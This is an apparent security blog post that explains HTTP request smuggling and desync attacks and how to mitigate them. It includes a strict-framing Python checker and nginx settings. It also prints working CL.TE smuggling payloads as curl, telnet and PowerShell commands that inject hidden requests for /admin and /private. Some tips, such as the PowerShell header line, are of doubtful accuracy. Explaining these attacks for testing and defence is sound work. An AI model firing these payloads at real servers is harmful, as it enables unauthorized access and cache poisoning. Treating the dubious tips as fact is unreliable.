
HTTP Request Smuggling and HTTP Desync attacks exploit inconsistencies in how web servers process requests. These techniques are critical for penetration testers and security professionals.
HTTP Request Smuggling (HTTP/1.1 & HTTP/2)
- Exploits differences in how front-end (reverse proxy, CDN, load balancer) and back-end (API server, database, Node.js) servers interpret request boundaries.
- Manipulates `Content-Length` and `Transfer-Encoding` headers to inject hidden requests.
Key Traits
- Front-end frames the body by `Content-Length: N` (a decimal byte count), while the back-end frames it by `Transfer-Encoding: chunked` (chunk sizes given in hex).
- If successful, the back-end processes smuggled requests, leading to cache poisoning, credential theft, or unauthorized access.
HTTP Desync Attack
- Occurs when request parsing falls out of sync between components (WAF, proxy, app server).
- Causes request queue poisoning, response misdelivery, and boundary confusion.
Key Indicators
- 502 Bad Gateway errors suggest misrouted requests.
- Request smuggling can lead to desync if servers interpret headers differently.
You Should Know: Practical Exploitation & Defense
Testing for HTTP Request Smuggling
Using curl to test CL.TE (Content-Length vs Transfer-Encoding):

```
# $'...' makes the shell emit real CR/LF bytes; inside plain double quotes \r\n would be sent literally
curl -X POST http://target.com -H "Transfer-Encoding: chunked" -H "Content-Length: 6" --data-binary $'0\r\n\r\nGET /admin HTTP/1.1\r\nHost: target.com\r\n\r\n'
```

Using Burp Suite to automate smuggling:
1. Intercept a request in Burp.
2. Modify headers to include conflicting `Content-Length` and `Transfer-Encoding`.
3. Forward and observe server behavior.
Detecting Desync Vulnerabilities
Check for inconsistent parsing with telnet (the blank lines terminate the header block and the chunked body):

```
telnet target.com 80
POST / HTTP/1.1
Host: target.com
Content-Length: 50
Transfer-Encoding: chunked

0

GET /private HTTP/1.1
Host: target.com

```

- If the server processes the smuggled request, it's vulnerable.
Mitigation Techniques
- Normalize headers at the proxy level.
- Disable HTTP/1.0 support if possible.
- Patch web servers (Apache, Nginx, HAProxy) to prevent inconsistent parsing.
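The "normalize headers at the proxy level" point above is usually implemented as a strict framing check on the front-end before a request is forwarded. The following is an added illustration, not code from the original post or from any named proxy; it rejects every request head a front-end and back-end could frame differently (CL together with TE, duplicate or non-decimal CL, obfuscated TE tokens, whitespace before the colon). The sample request heads are constructed and use the placeholder host example.invalid.

```python
import re

# Constructed sample request heads (up to and including the blank line).
AMBIGUOUS_CLTE = (b"POST / HTTP/1.1\r\nHost: example.invalid\r\n"
                  b"Content-Length: 6\r\nTransfer-Encoding: chunked\r\n\r\n")
OBFUSCATED_TE = (b"POST / HTTP/1.1\r\nHost: example.invalid\r\n"
                 b"Transfer-Encoding: xchunked\r\n\r\n")
CLEAN_CL = b"POST / HTTP/1.1\r\nHost: example.invalid\r\nContent-Length: 6\r\n\r\n"
CLEAN_TE = b"POST / HTTP/1.1\r\nHost: example.invalid\r\nTransfer-Encoding: chunked\r\n\r\n"


class FramingError(ValueError):
    """Body framing is ambiguous; the front-end must drop the request, not guess."""


def check_framing(head: bytes) -> str:
    """Return 'chunked', 'content-length' or 'none' for an unambiguous head,
    or raise FramingError for anything two parsers could disagree on."""
    cl_values, te_values = [], []
    for line in head.split(b"\r\n")[1:]:   # skip the request line
        if not line:                        # blank line ends the header block
            break
        if b":" not in line:
            raise FramingError(f"malformed header line: {line!r}")
        name, value = line.split(b":", 1)
        if name != name.strip():            # "Transfer-Encoding : chunked" or an obs-fold
            raise FramingError("whitespace around header name")
        if name.lower() == b"content-length":
            cl_values.append(value.strip())
        elif name.lower() == b"transfer-encoding":
            te_values.append(value.strip().lower())
    if cl_values and te_values:
        raise FramingError("both Content-Length and Transfer-Encoding present")
    if te_values:
        # Accept only the exact single token "chunked"; anything else is unsupported or obfuscated.
        codings = [c.strip() for v in te_values for c in v.split(b",")]
        if codings != [b"chunked"]:
            raise FramingError(f"unsupported Transfer-Encoding: {codings!r}")
        return "chunked"
    if cl_values:
        if len(set(cl_values)) != 1 or not re.fullmatch(rb"[0-9]+", cl_values[0]):
            raise FramingError(f"conflicting or non-decimal Content-Length: {cl_values!r}")
        return "content-length"
    return "none"


def rejects(head: bytes) -> bool:
    """True when check_framing refuses the request head."""
    try:
        check_framing(head)
    except FramingError:
        return True
    return False
```

A proxy applying this rule would refuse both the curl and telnet test requests shown later on this page, since each carries Content-Length and Transfer-Encoding together.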
Expected Output
- A vulnerable server may:
  - Return cached responses from another user.
  - Process smuggled requests as legitimate.
  - Leak internal API data.
What Undercode Says
HTTP desync and smuggling remain critical attack vectors because server implementations parse request boundaries inconsistently. Security teams must:
- Monitor for 502 errors (an indicator of desync).
- Test with automated tools (Burp, OWASP ZAP).
- Enforce strict header validation in load balancers.
Essential Linux & Windows Commands
Linux: Check open ports (useful for finding proxies)
netstat -tuln | grep 80
Windows: Test HTTP smuggling with PowerShell
Invoke-WebRequest -Uri "http://target.com" -Method POST -Headers @{"Content-Length"="6"; "Transfer-Encoding"="chunked"} -Body "0`r`n`r`nGET /admin HTTP/1.1`r`nHost: target.com`r`n`r`n"
Nginx mitigation (force HTTP/1.1 normalization)
proxy_http_version 1.1;
proxy_set_header Connection "";
Prediction
As HTTP/2 adoption grows, new variants of smuggling attacks will emerge, requiring deeper protocol-level analysis. AI-powered fuzz testing may become essential for detecting desync flaws.
Reported By: Activity 7328680113951109120 – Hackers Feeds


